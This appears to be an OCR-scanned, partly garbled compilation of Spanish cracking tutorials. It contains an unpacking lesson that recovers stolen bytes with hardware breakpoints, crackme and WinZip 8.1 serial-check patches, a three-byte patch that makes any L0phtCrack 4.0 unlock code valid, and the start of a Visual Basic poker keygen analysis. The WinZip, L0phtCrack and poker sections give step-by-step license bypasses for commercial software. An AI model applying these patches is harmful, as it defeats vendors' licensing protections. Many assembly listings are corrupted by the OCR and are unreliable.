SH_EDI 
MOU DWORD _PTR SS: [EBP-18],ESP 
EDX, EDX 
DL,A 
DWORD _PTR DS: [45E634],EDX 
ECx, EAX 


ECX, BFF 
ome PTR DS: [455630], ECXx 


X 

ECX, EDX 

DUORD_PTR DS: [45E62C], ECX 
DWORD _PTR DS: [45E624 


UnPackMe 


D 
o 
ho] 
H 
O 
las] 
H 
D 
rm 


PUSH 1C 
ADD ESP, 4 


CALL 0042A1Fa 
TEST EAX, EAX 


Allí nos avisa que se disparo nuestro HBP, le damos a que no continúe apretando NO. 


OllyScript 


ll ) Script finished 


Y evitamos que nos borre el HBP que colocamos y estamos detenidos en el OEP usando 
HBPs. 


a dj ol] 


PUSH_4292C8 

3/MOU EAX, DWORD PTR FS: [6] 
PUSH _EAX 

S 0060061 MOU DWORD_PTR FS: [6J,ESP 
; ADD ESP, -58 

PUSH EBX 


Real entry point of SFX code 


Es muy importante en estos nuevos packers tener la forma de evitar el borrado de los HBP, y 
ya lo hemos conseguido ya que para cualquier salto mágico o HBP que necesitamos colocar, 
tenemos mas armas contra ellos ya que los podremos usar. 


Ahora ya que podemos manejar perfectamente los HBP pasaremos a los stolen bytes. 


Veamos si podemos llegar hasta la ultima exceptions y tracear desde allí. 


WANUUWO+SYSTEMIE COMO SILA DLL 
WINDOWS system32oSHLWAPT. dll 


7] MIOQU LE AS 
EN 
A 
EN 


L 
Module C 
Module C 
Module C: WINDOWS *system32COMCTL32.d 11 
Module Co WINDOWS system32SHELL32. dll 
Module C:wWINDOWS+WinS+Sx86_Microsoft.lindows. Common—-Controls_6595b64144ccf1df_6.5.26 
Module Ci WINDOWS sy stem32WINSPOOL. DRU 
Module C:9WINDOWSssystem32moledla.dll 
Module C:WwINDOWSssystem32role32.dl!l 
241 INT3 command at UnPackMe. 66471394 

; Breakpoint at ntdll. E (KilserApcDispatcher+20) 
eip = YCO1EREC ; ntdll.KilserExceptionDispatcher 
o] Ereakpoint _at_ntdll.  >CÓ1EBOS (KiUserApcDispatcher+43) 


YC91EBB 


o =E 
95 As at UnPackMe. 06471395 
eip = 004/1395 
Access Violation when reading [FFFFFFFFI 
. Breakpo int at ntdl1.KilserExcept ionDispatcher (KilserApcDispatcher+2C) 
eip = YC91EREC ; ntdll.KilserExcept ionDispatcher 
3 Es ntdll.7C91EB03 (KiUserApcDispatcher+43) 


" 


eip = 00427185 


Seco - 


Hardware breakpoint 1 at UnPackMe.004271B5 


En el LOG veo que esa es la ultima excepción antes de llegar al OEP, así que como veo que 
es una ACCESS VIOLATION WHEN READING, quitare esa tilde para que pare en dicha 
exceptions. 


== Debugging options LS 
Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug | Events Exceptions Trace | SFX | Strings | Addresses | 


[4 Ignore memory access violations in KERNEL32 


Ignore (pass to program) following exceptions: 
ÍV INTI breaks 
[Y Single-step break 
[Memory access violation 
[Y Integer division by O 
ÍV Invalid or privileged instruction 
[VAN FPU exceptions 


[4 Ignore also following custom exceptions or ranges: 


20000002 (DATATYPE MISALIGNMENT] Add last exception 


CODOOOSF [FLOAT INEX4CT RESULT) 


¿Add range 
Delete selection 


Undo Cancel | 


deshabilitare los Bps que coloque para usar el script. 


YC91EREC | n A MOU ECx, DWORD P 
YC91EB03 ntall Always CALL 7C91D619 


Remove Del 
Disable Space 
Edit condition 


Follow in Disassembler Enter 


MC 


Copy to clipboard » 
Appearance » 


Y ahora reinicio y doy RUN 


Era EM ESESN ESPA al + 1]2/m/7)w1/c)+]x/8]Rr]- 


INC Enx 
INC_EAX 
BECA OR _EAX, EAX 
9r8s Beoueoas | JNz au471158 UnPackMe. 60471150 


PUSHAD 
2D8D 36874100 |LEA EDI,DUORD PTR SS: [EBP+418736 
8D8D 70BE4100 |LEA ECX,DWORD PTR SS: CEBP+41BE70] 


Allí para en la ultima exceptions, pongo un BPM ON ACCESS en la sección que esta 
ejecutándose, para que pare seguramente en el manejador de excepciones. 


60457000] 00009000] UnPackMe] .data Imag RWE 

560460000 | 00003090 | UnPackMe| . idata Imas|£ RUE 

560463000 | BOBBSOBA | UnPackMe! .rsrc resources Imag|R 

1604680009 00023990 UnPackMe .perplex!| SFX, impo-* 

00490000 | OOBBSADA Acrualizn 

BO0S5000B| 0ABBZODO á E 

00560000 | OB1G30BB View in Disassembler Enter 
00670000 | 001150909 y 

60970000) 00001000 Dump in CPU 

151501 951515/5185/5/515151515] 

15J5J815/515151510 5151515451515] Dump 

53C30000 | 00061066 COMCTL32 PE heade 

52C31000| 00070000| COMCTL32| .text code, imp. Search Ctrl+B 


o 
¿«PSro resource 
58CC3000| 09884000| COMCTL32| .reloc |relocati| Set break-on-access FZ 
584380000 | 000010090 | umdrms fir PE heade 
58431000! 000039090 | umdnxfim| ¿text code, ¡mp 
58434000 | 000610990 | umdnxfcm| data data 
584285000 | 090961000 | umdmxfinm| ¿esco resource 
ERISAARA! ARARIARA! urnas! .relnr relnnatr i 


Paso la excepción con SHIFT +19 


MOU EBX, DWORD PTR SS: [ESP+C] 
2000060 (ADD DWORD _PTR DS: [EBX+B8],2 
XOR EAX, EAX 


RETN 
PUSH_DWORO_PTR_FS:C0] 
MOU DWORD PTR FS:[6],ESP 
XZ0R EAX, EAX 


Ahora traceo con f7 estas lineas del manejador de excepciones llegando al RET y al apretar 
RUN volvemos al programa en 


00471090 40 INC EAX 


da ea] ole slo] 1] + ojejmjriwjnjc]//k]8/R]»] 


INC ERx 

40 INC_EAX 
BECO OR_EAX, EAX 
v BFS5 B6b000B0a UnPackMe. 60471150 


bn4r1691 
bn471 
bn471 


00471094 60 PUSHAD 

664710698]  SDBD 36674108 |LEA EDI,DWORD PTR SS: [EBP+41B736] 

664715091 4F DEC EDI 

6647156982| 8D8D 70BE4100 |LEA ECXx, poi PTR SS: [EBP+41BE70] 

40471548 8301 62 ADD ECx 

004710AB| 2BCF sub ECX, É01 

B04710AD| C1E9 82 SHR ECx,2 

0u4710B0| ES 49DSFFFF UnPackMe. BB46ESFE 
004710ES| AB STOS DWORD PTR ES: CEDIJ 

004710B6|+ E2 FS LOOPD SHORT 604715B9 UnPackMe. 00471080 
0u4710BS1 61 POPAD 


Ahora si ya pasada la excepción, pongo el BP en el OEP ya que esta ya desempacado allá y 
me servirá para que pare cuando termine de tracear. 


Real entry point of SFX code 


683 hai 
68 [3924 29208 
e Al DobMboaBn O ¿DWORD PTR FS: [6] 


ARÍA71MAL E PIUISH EMT 


y desde 471090, iniciemos el traceo y vemos que tarda bastante ya que no saltea nada y pasa 
por todas las instrucciones una a una. 


Allí paro al fin en el OEP así que puedo mirar el listado de la fila txt. 


FEA Au] visi $0 e] + Ljelmitiwjnfc)+]k]B/r]»-Js] ¿31?] 


68 6040E4500 PUSH 45ME60 Real entry point of SFX code 
68 [3924200 PUSH _4292C8 

64:A1 00900990 | MOU EAX, DWORD PTR FS: [6] 

50 PUSH EAX 


64:3925 MB04B0/ MOV DWORD _PTR FS: [07,ESP 
3304 AS SP, -58 


ADD E 
als a PUSH EBX 
00427101 56 PUSH ESI 
004271D2| 57? PUSH EDI Da 
ARA?71MAÍ  RQRE FR MAN MINAN PTR SS:TERP-121 FSP 


00485EAE Main  JL SHORT 00485ECA 
00485ECA Main POPAD ; EAX=00000000, ECX=0012FFEBO, 
EDX=7C91EB94, EBX=7FFDF000, ESIZFFFFFFFF 
00485ECB Main JMP SHORT 00485ECE 
00485ECE Main JMP DWORD PTR DS:[485ED4] 
Breakpoint at UnPackMe.004271B5 


allí están las ultimas lineas del txt y si busco de allí hacia arriba PUSH EBP, que es 
generalmente la primera instrucción de un programa. 


Buscar siguiente 
Dirección Cancelar 


6) Arriba O) Abajo 


Buscar: ¡push ebp 


E] Coincidir mayúsculas y minúsculas 


00485AF3 Main PUSH EBP 

00485AF4 Main MOV EBP,ESP ; EBP=0012FFC0 
00485AF6 Main PUSH -1 

00485AFS Main NOP 

00485AF9 Main PUSHAD 

00485AFA Main  PUSHAD 

00485AFB Main CALL 00485B00 


00485B00 Main POP ESI ; ESIZ00485B00 

00485B01 Main SUB ESL6 ; ESIZ00485AFA 

00485B04 Main MOV ECX,35 ; ECX=00000035 
00485B09 Main SUB ESLECX ; ESI=00485AC5 
00485B0B Main MOV EDX,E3D6D5FD ; EDX=E3D6D5FD 
00485B10 Main  SHR ECX,2 ; ECX=0000000D 
00485B13 Main SUB ECX,2 ; ECX=0000000B 
00485B16 Main  CMP ECX,0 


Allí vemos los stolen bytes y luego empieza a hacer pavadas pero antes de hacerlas guarda 
con PUSHAD el valor correcto de los registros que recuperara con POPAD justo antes de 
saltar al falso OEP. 


00485ECA Main POPAD ; EAX=00000000, ECX=0012FFBO, 
EDX=7C91EB94, EBX=7FFDF000, ESIZFFFEFFFFF 
00485ECB Main  JMP SHORT 00485ECE 
00485ECE Main  JMP DWORD PTR DS:[485ED4] 
Breakpoint at UnPackMe.004271B5 


Por supuesto vemos que los stolen bytes coinciden con los valores que nos sobraban en el 
stack 


FFFFFFFF 
BB12FFFO 
rCca1604F 
YC920738 
FFFFFFFF 
YFFOFO0B 
3054A938 


e. <¿ModuleEntryPoint 


Además el otro registro diferente al inicio es casualmente es EBP que varía al hacer el mov 
ebp,esp 


00485AF3 Main PUSH EBP 
00485AF4 Main MOV EBP,ESP ; EBP=0012FFC0 


00485AF6 Main PUSH -1 


OO12FFEO 
C91EB94 ntdll.KiFastSystemí 
X 7FFDFO06 

? BB12FFBC 


; ntdlL. 7 CO AB3S 
' 604271B5 UnPackMe. 004271B5 
ES 0923 32bit B(FFFFFFFF) 


Vemos que el listado del txt nos muestra que EBP tomo el valor 12FFc0, que es el mismo 
valor que tiene al llegar al falso OEP, todo lo que viene a continuación son solo volteretas 

para despistar y podrían no existir perfectamente, ya vemos que luego de tanta vuelta, EBP 
vuelve a valer 12ffc0, lo que demuestra que esos eran los stolen bytes correctos y todo lo 


intermedio es pura cascara. 


Bueno con eso obtuvimos los famosos stolen bytes, hicimos funcionar el script que evita que 
nos borren los HBP y creo que por esta parte es suficiente seguiremos en la parte 43. 


Hasta la parte 43 
Ricardo Narvaja 
miércoles, abril 26, 2006 
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Hola, aca estoy de Nuevo con un Nuevo tutorial, como veran mis ultimos 2 
tutos se refieren a cackmes, ya que descubri que estos pueden llegar a 
ser mas divertidos que los programas mismos. Bueno este crackme me parece 
que es medio viejo, no se la verdad pero yo lo tenia desde hace mucho 
tiempo y no le daba bola. Asi que estan avisados!!!! 


Uhmmmm vamos a hacerlo rapido, vamos a abrir el SiCe y luego cargamos el 
Crackme, vamos a la seccion de registrar y ponemos un serial y un nombre 
cualquiera como gr00vy 123123123 ok? Bueno, ponemos un bpx getwindowtexta 
y un bpx getdlgitemtexta y volvemos al programa. Apretamos OK o lo que 
sea, y saltamos al sice, apretamos F5 para que nos lea el serial no el 
nombre y ahora apretamos F12 para salir de la parte que no nos interesa 
traceamos con F10 un ratito y vemos que nos vamos a ir a otro codigo que 
es de una librería asi que apretamos F12 varias veces hasta que en la 
pantalla nos aparezca crackme text o algo asi ok? Bueno una ves ahí (mas 
o menos en 00401228) vemos que hay un PUSH que pushea nuestro nombre, y 
luego una Call: 


:00401223 83F800 cmp eax, 00000000 
:00401226 74BE je 004011E6 
CHEQUEA SI HAY CARACTERES Y SINO VA A ERROR 
:00401228 688E214000 push 0040218E 
PONE NUESTRO NOMBRE EN LA PILA 

:0040122D E84C010000 call 0040137E 


UHMMM CALL INTERESANTE ENTREMOS : 


:0040137E 8B742404 mov esi, dword ptr [esp+04] 
:00401382 56 push esi 

EN ESTI NUESTRO NOMBRE 

:00401383 8A06 mov al, byte ptr lesil 
LA PRIMERA LETRA DE NUESTRO NOMBRE EN AL 

:00401385 84C0 test al, al 

:00401387 7413 je 0040139C 

COMPRUEBA SI LA PRIMERA LETRA EXISTE O NO 

:00401389 3C41 cmp al, 41 

:0040138B 721F jb 004013AC 

:0040138D 3C5A cmp al, 5A 

:0040138F 7303 jnb 00401394 


COMPRUEBA SI LA PRIMER LETRA ESTA ENTRE 41h (A) y 5A (Z) COMO SI ESTA 
ENTRE ESAS 2 LETRAS NO SALTA Y: 
:00401391 46 inc esi 


SE INCREMENTA ESI 

:00401392 EBEF jmp 00401383 

SALTA Y HACE LO MISMO CON TODAS LAS DEMAS LETRAS EXEPTO CON LOS 2 CEROS 
DE EL NOMBRE gr00vy YA QUE NO ESTAN ENTRE A Y Z ASI QUE LAS VAMOS A TENER 
QUE CAMBIA POR gr00vy OK? Bueno una ves pasada esta comprobación salimos 
del call y vemos: 


:00401233 687E214000 push 0040217E 

PONE EL s/n en la pila 

:00401238 E89B010000 call 004013D8 

genera el s/n correcto (para los buscadores de serials) 
:0040123D 83C404 add esp, 00000004 
:00401240 58 pop eax 

:00401241 3BC3 cmp eax, ebx 

compara los 2 datos generados a partir del nombre y el s/n 
:00401243 7407 je 0040124C 


si salta es el mensaje de bien hecho asu que ya sabemos que hacer, si lo 
queremos cambiar temporalmente con el sice tecleamos R FL Z y vemos el 
mensaje de bien hecho o sino anotamos la dirección del salto, abirmos el 
crackme con el w32dasm, vamos a 00401243 y nos fijamos cual es el offset 
y invertimos Oo hacemos JMP el JE y estamos registrados!!!! 

:00401245 E818010000 Call 00401362 

GENERA EL MENSAJE DE MAAAAALLL!!! 


Bueno espero que les halla gustado, ya que no tenia muchas ganas de 
escribir, por que estoy resfriado, pero bueno que le vamos a hacer. 
Dedicado a S[Ihliff, ]- [unter y Marduk que espero verlos pronto cuando 
valla a BS AS ok? 


ttp: / /www.zencracking.com.ar 
ttp://qroovyvcracking.8m.com 


Como crackear el Winzip 8.1 por gr00vy 


Web: 
E-mail: [groovy2600eyahoo.com.ar 
Download: 


Dificultad: Punga 

Hola, con la escusa de que salio el winzip nuevo, voy al sitio y me lo 
bajo. Espero que hallan aprendido algo los de Nico Software. Vamos a ver 
si asi lo hicieron. 

Uhmmm bueno, en esta versión te muestra la ventanita de registrame o sino 


me ves por el resto de tus dias. Vamos a introducir el serial, vemos que 
nos larga la misma nag box: 


(X) Incomplete or incorrect information. 


Ca] 


Bueno, por ahora lo unico nuevo que le vi al winzip es que aparece en la 
bandeja de tray (muy molesto). Asi que su sist de seguridad no debe ser 
muy bueno , vamos a ver. Desensamblemos y busquemos esa string. Vemos que 
se desensambla todo bien, (podrían haberlo empacado almenos). Encontramos 
la string en: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 


| :0040BD1B(C), :0040BD24 (C), :0040BD2D(C) 

| 

:0040BD7C E8C3020000 call 0040C044 

* Possible Reference to String Resource ID=00654: "Incomplete or 


incorrect information" 


:0040BD81 688E020000 push 0000028E 


Uhmm casi igual al otro tuto. La verdad que no aprendieron anda, pero a 
nosotros nos viene bien, asi que vamos a hacer lo que hicimos en el otro 
tuto. Nos vamos a 0040BD1B ya que hay un salto que si se ejecuta va al 
error: 


:0040BD12 803D90C74C0000 cmp byte ptr [004CC7901, 00 
:0040BD19 59 pop ecx 

:0040BD1A 59 pop ecx 

:0040BD1B 745F je 0040BD7C 


Compara a ver si nuestro nombre es igual a cero y si es cero caracteres 
salta a el error. No es necesario noopear. Ya que si introducimos algo en 
el textbox no va a saltar, lo mismo pasas con el otro salto, comprueva si 
hay o no caracteres en el 2do textbos, asi que con esos 2 no hacemos 
nada, vamos a 0040BD2D: 


:0040BD26 E831F9FFEFF call 0040B65C 
:0040BD2B 84C0 test al, al 
:0040BD2D "744D je 0040BD7C 


Tambien me es muyyyy conocido, es la misma rutina de comprobación, 
noopemos ese JE o inviértanlo como quieran, luego entremos en el call a 


ver que hay: 


* Referenced by a CALL at Addresses: 


| :0040108E , :+0040121B , :00405A7D , :0040BD26 , :+004528B7 
| 

:0040B65C 55 push ebp 

:0040B65D 8BEC mov ebp, esp 

:0040B65F 81EC0C020000 sub esp, 0000020C 

:0040B665 8065FF0O0O and byte ptr [ebp-01], 00 
:0040B669 803D90C74C0000 cmp byte ptr [004CC790], 00 
:0040B670 53 push ebx 

:0040B671 56 push esi 

:0040B672 57 push edi 

:0040B673 0F84FB000000 je 0040B774 

:0040B679 8D45E8 lea eax, dword ptr lebp-18] 
:0040B67C 50 push eax 


uhmmm ya esta comprobado es lo mismo sras y sres, lo que nos hace falta 
es noopear algunas calls y listo ya esta registrado. 


Entramos en 0040108E ups no es lo mismo!!!!, vemos que hay: 
:0040108E E8C9A50000 call 0040B65C 

:00401093 84C0 test al, al 

:00401095 746A je 00401101 


Invertimos el je, como no tenemos el SICE no podemos ver que hace pero 
bueno, provar no nos hace nada. 
Vamos ahora a 00401218B: 


:0040121B E83CA40000 call 0040B65C 
:00401220 84C0 test al, al 
:00401222 “7512 jne 00401236 


Invertimos el jne, como no tenemos el SICE no podemos ver que hace. 
Vamos a 00405A7D 


:00405A7D E8DA5B0000 call 0040B65C 
:00405A82 84C0 test al, al 
:00405A84 7531 jne 00405AB7 
:00405A86 E83AE4FFEFF call 00403EC5 
:00405A8B 84C0 test al, al 
:00405A8D “7428 je 00405AB7 


* Possible StringData Ref from Data Obj ->" (Evaluation Version)" € Vemos 
que es el titulo que aparece en la ventana!!!! 

Como vemos, aca hay un texto que es el que aparece en la ventana cuando 
no estamos registrados, supongo que si invertimos el jne que esta en 
negrita va a saltar y no lo va a mostrar, (hago la prueba si ninguna otra 
modificación y funciona). 

Ahora vamos a 0040BD26: 

Y vemos que este salto ya lo habiamos “trabajado” O 


Bueno ahora vamos a 004528B7 y vemos que 
:004528B7 E8AO0O8DFBFF call 0040B65€C 
:004528BC 84C0 test al, al 


:004528BE 0F8495000000 je 00452959 


:004528C4 C645FFO1 mov [ebp-01], 01 

Aca si invertimos el salto, y es que no se ejecuta, se nos va a mover un 
valor a un reg, con un 1 que yo pienso que es el flag que le dice al 
programa si estamos registrados o no!!! Asi que probamos el proggie y nos 
funka todo como tiene que esta!!! 


Uds se preguntaran por que, noopeamos el JE de 0040BD2D, pues por que si 
ven un poco mas abajo del codigo van a ver algo como esto: 


* Possible StringData Ref from Data Ob] ->"Name" 


:0040BD30 680CDD4B00O push 004BDDOC 

:0040BD35 FF351CC74A00 push dword ptr [004AC71C] 
:0040BD3B E867FA0400 call 0045B7A7 

:0040BD40 56 push esi 


* Possible StringData Ref from Data Ob] ->"SN" 


:0040BD41 68B0EA4B00 push 004BEABO 
:0040BD46 FF351CC74A00 push dword ptr [004AC71C] 
:0040BD4C E856FA0400 call 0045B7A7 
:0040BD51 FF3518C74A00 push dword ptr [004AC718] 
:0040BD57 6A00 push 00000000 
:0040BD59 6A00 push 00000000 


O sea que pone en algun lado (en la ventanita de about) nuestro serial y 
el nombre, o sea que esta registrado, por eso nosotros noopeamos el JE 
para que siga con las siguiente instrucciones y register el proggie!!. 
Bueno el call lo noopeamos por que es una Call que es llamada al inicio 
del programa que checkea la validez de el serial number asi que debiamos 
noopearlo. 


Bueno espero que les halla gustado y que los de nico mak computing 
aprendan algo de esta guia ok? 


TUTORIAL: Cómo crackear el LOpth Crack 4.0 
Una alternativa al tutorial de Groovy. 


Por Belzebú, 22/05/03 


Programa Lopth Crack 4.0 


Descarga http://www. atstake.com/research/lc/a 


Objetivo Hacer ke cualkier “Unlock code” introducido sea válido y así 
registrar el programa. 


Herramientas...W32Dasm, Softlce, un Editor Hexadecimal y CodeFusion 


INTRODUCCIÓN 


Este tutorial es una alternativa al documento que publicó Groovy en su web 
http://www .zencracking.com.ar. Recomiendo descargar y leer previamente 
aquel tutorial y posteriormente éste, ya que en algún momento se hará 
referencia a él y alguna parte puede kedar confusa. 


DESARROLLO 


En la solución planteada por Groovy me pareció muy pesado el ir “nopeando” 
todos los saltos posteriores a la llamada a la función donde se comprueba la 
clave, así que decidí investigar un poco más esa 

CALL 0042789B 


Partí con el W32DASM estudiando las string references: “You have 
successfully registered” o "You have entered an invalid code”, por ejemplo, con 
lo que llegamos a la siguiente parte del código: 


:00411BFF 52 push edx ==> Ahí va el "Unlock code" correcto correspondiente al "serial number" del programa 
:00411C00 50 push eax ==> Ahí va el "Unlock code" ke introducimos nosotros 


:00411C01 E8955C0100 call 0042789B ==>FUNCIÓN KE DICE SI LA CLAVE INTRODUCIDA ES O NO 
CORRECTA 


:00411C06 83C410 add esp, 00000010 

:00411C09 85CO0 test eax, eax 

:00411C0B 7523 jne 00411C30 ==> Siel "Unlock Code" introducido no es correcto salta a lazona TRIAL 
:00411C0D 8B07 mov eax, dword ptr [edi] 

:00411C0F 50 push eax 

* Possible StringData Ref from Data Obj ->"Unlock Code" 


| 
:00411C10 6850134700 push 00471350 
* Possible StringData Ref from Data Obj ->"Registration" + Sin comentarios 


| 

:00411C15 685C134700 push 0047135C 

:00411C1A 8BCE mov ecx, esi 

:00411C1C 899E3C010000 mov dword ptr [esi+0000013C], ebx 


:00411C22 E89AB20300 call 0044CEC1 

:00411C27 53 push ebx 

:00411C28 53 push ebx 

* Possible StringData Ref from Data Obj ->"You have successfully registered " > Sin comentarios 
->"LC4." 

| 

:00411C29 6834144700 push 00471434 

:00411C2E EB07 ¡mp 00411C37 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

|:00411C0B(C) 


| 

:00411C30 53 push ebx ==> ZONA TRIAL 

:00411C31 53 push ebx 

* Possible StringData Ref from Data Obj ->"You have entered an invalid code. " 
->"Please try again." 


| 
:00411C32 6800144700 push 00471400 


A continuación pasé el LC4 por el Softice, poniendo un BPX 00411C01. Al ira 
registrar el programa introduciendo cualkier clave, lógicamente salta el 
breakpoint. Si en ese momento escribimos en el softice: 

D EAX veremos la clave introducida por nosotros 

y si hacemos: 

D EDX veremos el "Unlock Code" correcto correspondiente al Serial number 
del programa. 

En mi caso, para un serial Code 1727b4112, el "Unlock correcto" es ea677a. 
Siguiendo con el Softice estudié por ké camino iba la ejecución del LC4, dentro 
de la llamada de comprobación del la clave, cuando la clave introducida no era 
la correcta. 

El Código de la CALL 00427896: 


* Referenced by a CALL at Addresses: 
|:00411983 , :00411C01 , :0042725C , :0042726D , :0042727E 
|:0042728F 


| 

:0042789B 55 push ebp 

:0042789C 8BEC mov ebp, esp 
:0042789E 83ECOC sub esp, 0000000C 
:004278A1 833DFC336B0000 cmp dword ptr [006B33FC], 00000000 
:004278A8 53 push ebx 

:004278A9 56 push esi 

:004278AA 57 push edi 

:004278AB 7512 jne 004278BF 
:004278AD FF750C push [ebp+0C] 
:004278B0 FF7508 push [ebp+08] 


:004278B3 E8C8690000 call 0042E280 ==> Esta llamada comprueba ke 
la clave introducida coincide símbolo a símbolo con la clave correcta 


:004278B8 59 pop ecx 
:004278B9 59 pop ecx 
:004278BA E96C010000 jmp 00427A2B 


* Referenced by a (U) nconditional or (C)onditional Jump at Addresses: 
|:004278BA(U), :00427A0C(U), :00427A1F(U) 


| 

:00427A2B 5F pop edi 
:00427A2C 5E pop esi 
:00427A2D 5B pop ebx 
:00427A2E C9 leave 
:00427A2F C3 ret 


Esta es la salida de la CALL 0042789B, ke devuelve si el " Unlock Code" 
introducido es correcto o no. 
La forma ke tiene de decirlo es: 


Si devuelve EAX=1, la clave introducida es INCORRECTA 
Si devuelve EAX=0, la clave introducida es CORRECTA. 


| 
Estos valores para EAX se generan en CALL 0042E280, ke es donde se 


verifica uno a uno ke los caracteres introducidos de la clave coinciden con la 
correcta: 


* Referenced by a CALL at Addresses: 
|:004038DF , :00403C3F , :00404FDA , :004050E5 , :004278B3 


| 

:0042E280 55 push ebp 

:0042E281 8BEC mov ebp, esp 

:0042E283 57 push edi ==>Ahí va ahora la clave introducida 
:0042E284 56 push esi==>Ahí va ahora la clave correcta 
:0042E285 53 push ebx 

:0042E286 8B750C mov esi, dword ptr [ebp+0C] 

:0042E289 8B7D08 mov edi, dword ptr [ebp+08] 

:0042E28C 8D05740E6B00 lea eax, dword ptr [006B0E74] 
:0042E292 83780800 cmp dword ptr [eax+08], 00000000 
:0042E296 753B ¡ne 0042E2D3 

:0042E298 BOFF mov al, FF 

:0042E29A 8BFF mov edi, edi 

* Referenced by a (U) nconditional or (C)onditional Jump at Addresses: 
|:0042E2A8(C), :0042E2C8(C) 


| 
:0042E29C OACO or al, al==>TENER EN CUENTA 


:0042E29E 742E je 0042E2CE ==>Cuando ha terminado de comprobar uno a uno los caracteres de la 
clave 
este salto nos saca del bucle de comprobación. TENER EN CUENTA!!! 


:0042E2A0 8A06 mov al, byte ptr [esil ==> Se toma el primer carácter de la clave correcta contenida en "esi" 
y se pone en "al" 

:0042E2A2 46 inc esi ==> se incrementa uno para pasar al próximo carácter de la clave correcta 

:0042E2A3 8A27 mov ah, byte ptr [edi]==> Se toma el primer carácter de la clave introducida contenida en 
"edi" y se pone en "ah" 

:0042E2A5 47 inc edi ==> se incrementa uno para pasar al próximo carácter de la clave introducida 
:0042E2A6 38C4 cmp ah, al ==> Akí se comparan ambos caracteres 

:0042E2A8 74F2 je 0042E29C ==> Si son iguales salta atrás para comprobar el siguiente carácter 
:0042E2AA 2C41 sub al, 41 Si no son iguales al final de todas las operaciones EAX=1=TRIAL. VER 
MAS ABAJO 

:0042E2AC 3C1A cmp al, 1A 

:0042E2AE 1AC9 sbb cl, cl 

:0042E2B0 80E120 and cl, 20 

:0042E2B3 02C1 add al, cl 

:0042E2B5 0441 add al, 41 

:0042E2B7 86E0 xchg al, ah 

:0042E2B9 2C41 sub al, 41 

:0042E2BB 3C1A cmp al, 1A 

:0042E2BD 1AC9 sbb cl, cl 

:0042E2BF 80E120 and cl, 20 

:0042E2C2 02C1 add al, cl 

:0042E2C4 0441 add al, 41 

:0042E2C6 38E0 cmp al, ah 

:0042E2C8 74D2 je 0042E29C 

:0042E2CA 1ACO sbb al, al 

:0042E2CC 1CFF sbb al, FF 

* Referenced by a (U) nconditional or (C)onditional Jump at Address: 

|:0042E29E(C) 


| 
:0042E2CE OFBECO movsx eax, al ==> Akí se asigna a EAX el valor 0O=REGISTRADO ó 1=TRIAL, 


y depende del valor ke ha tomado "al" en las operaciones anteriores 
:0042E2D1 EB78 ¡mp 0042E34B. 


SOLUCION PROPUESTA 


Con todo lo anterior, la solución planteada consta de 2 pasos: 


PASO 1 


No me interesa ke compruebe ningún carácter entre la clave introducida y la 
correcta por lo tanto el salto: 


:0042E29E 742E je 0042E2CE 

lo sustituyo por: 

:0042E29E EB2E ¡mp 0042E2CE 

Con este cambio no se efectuará la comprobación, pero debemos asegurarnos 


de ke "al" tenga el valor ke nos convenga a nosotros es decir, ke "al"=0 para 
que en MOVSX eax, al, EAX=0=REGISTRADO. 


PASO 2 


Para conseguir ke EAX=0, en la instrucción previa al salto ke acabamos de 
modificar, hacemos lo siguiente: 


:0042E29C OACO or al, al 

lo sustituyo por : 

:0042E29C B000 mov al, 00 

Tras estos cambios acepta cualkier clave introducida como correcta. En esta 
alternativa se modifican solamente 3 bytes, por lo ke creo ke es más cómodo. 


CONTACTO. 


Para comentarios, sugerencias, corrección de errores o dudas podeis poneros 
en contacto conmigo en: 


belzebuWanonima.com 


Un saludo de: 
Belzebú. 


Whiskey Kon Tekila 


¡Advanced Video Poker yLI | 95/08 0 
Descripción J uego de Poker al estilo Casino 


| Programa 


| Tipo ¡Shareware 
| Url Ihutp://www.aha.ru/-aasamson/download/ 

Protección ¡Número de Serie. Time Limit 30 Dias 

Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
Herramientas  [Smartcheck v6.01 (Build 952) 

Objetivo ¡Buscar el número de serie y crear su Key-Generator 
A 
Fecha [l4deAgostode 1999 


oO 
Vi 


El programa es un clásico juego de Poker al estilo de los casinos norteamericanos, 
ameno y bonito. Su protección es de 30 dias, libre de nags o recordatorios que nos 
induzcan a registrar el programa. Pasados los 30 dias se acabó, no juegas más. 
Programa elaborado en Visual Basic e interesante para comenzar a usar Smartcheck 
para estudiar el comportamiento de la rutina generadora del número de serie 


> 
V 


Cargamos Smartcheck y desde ahí lanzamos el programa que vamos a estudiar. Bien 
, vamos a incorporar gráficos para ilustrar mejor el comportamiento de Smrtck, de 
acuerdo? Así nos resultará más fácil de comprenderlo (y menos teclas a tocar pa mi 
xDDDD). Lanzamos el programa desde la opción Program/Start y una vez dentro de 
él nos vamos a la opción Register. Entramos como nombre: Usuario 
Registrado[WkT!] y como número de serie, mi número mágico: 9900990099, ¡vale, 
vamos allá! 


String [85] -> Integer [85] 


Integer (170) --> String (11 70" 


$% ValStrina:'170") retums double:170 [displayed as single-precision floating point 
9% Mid$[String:"Usuario ...", long:2, VARIANT:Integer:3) 

»£ 

$% Asc(String: "Usuario ..."') retums Integer:85 

9% SiWVARIANT:Double:255) 

P. String ("255") --> Integer (255) 

A 

$% ValString:'"370") retums double:370 [displayed as single-precision floating point 
$% Mid$íString:"Usuario ...", long:3, VARIANT: Integer: 4) 


double:572 [displayed as single-precision floating point 
$% Mid$(String:"Usuario ...", long:4, VARIANT:Integer:5) 

9% AscíString: "ario '") retums Integer: 97 

$% AscíString: "Usuario ...”) retums Integer:85 

9% SiVARIANT:Double:657) 


. 2 Cria MMLCERFRIAL s lrtrarmar (10571 


Mirad bien el comportamiento de la rutina. Toma el primer caracter del nombre y su 
código ASCII y se suma consigo mismo, al resultado le llamaremos SUMA 
(170=85+85), luego toma el segundo caracter (s) cuyo valor ASCH es 115, ok?, 


85 (cód ASCHU de "U"), sume- mos otra vez: 170+85+115= 370, ahora SUMA=370. 
Ya tenemos la fórmula, SUMA + Cód.ASCII del primer carácter del nombre + cód. 
ASCII de cada uno de los caracteres del nombre, al final, esto dá un resultado, en 
este caso: 4355, Bien qué hace, además, la ru- tina de cálculo del número de 
serie???, veamos: 


Integer (4355) --> String ("'4355""] 
WalíString:"'4355"] returns double:4355 [displayed as single-precisic 


Len(VARIANT[Double: 4355] feturns LONG:7793016 

